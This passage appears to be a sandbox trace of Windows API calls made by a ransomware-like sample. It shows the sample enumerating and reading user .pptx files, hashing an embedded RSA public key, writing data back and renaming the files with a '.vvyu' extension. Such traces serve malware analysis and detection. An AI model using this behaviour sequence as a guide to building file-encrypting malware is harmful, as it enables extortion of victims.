[0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d68 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0195.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d68 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0195.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0195.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0195.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0195.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea14e8 | out: hHeap=0x620000) returned 1 [0195.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0195.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.980] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x163c1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x163c1, lpOverlapped=0x0) returned 1 [0195.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.981] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x163c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.981] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0195.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0195.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.983] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0195.983] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.983] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.983] CloseHandle (hObject=0x568) returned 1 [0195.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0195.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.986] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\4Q235S.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\4q235s.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\4Q235S.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\4q235s.pptx.vvyu")) returned 1 [0195.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.987] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0195.990] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x322ee1b0, ftCreationTime.dwHighDateTime=0x1d89bec, ftLastAccessTime.dwLowDateTime=0x62947bb0, ftLastAccessTime.dwHighDateTime=0x1d8a6b1, ftLastWriteTime.dwLowDateTime=0x62947bb0, ftLastWriteTime.dwHighDateTime=0x1d8a6b1, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6a8RDH85d8whH-HX.pptx", cAlternateFileName="6A8RDH~1.PPT")) returned 1 [0195.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0195.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.990] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\6a8RDH85d8whH-HX.pptx") returned=".pptx" [0195.990] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\6a8RDH85d8whH-HX.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\6a8rdh85d8whh-hx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.991] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=31718) returned 1 [0195.991] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.994] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x7bc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.994] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.998] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.998] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x7be6, lpOverlapped=0x0) returned 1 [0195.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.999] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.999] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.000] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.000] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.000] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.000] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.000] GetLastError () returned 0x0 [0196.000] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.000] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.001] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.001] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.001] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7bf0) returned 0x2ea79b0 [0196.002] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea14e8 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1530 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.003] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d80 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.006] GetCurrentThreadId () returned 0x66c [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4d50 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.007] GetCurrentThreadId () returned 0x66c [0196.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.008] RtlAllocateHeap 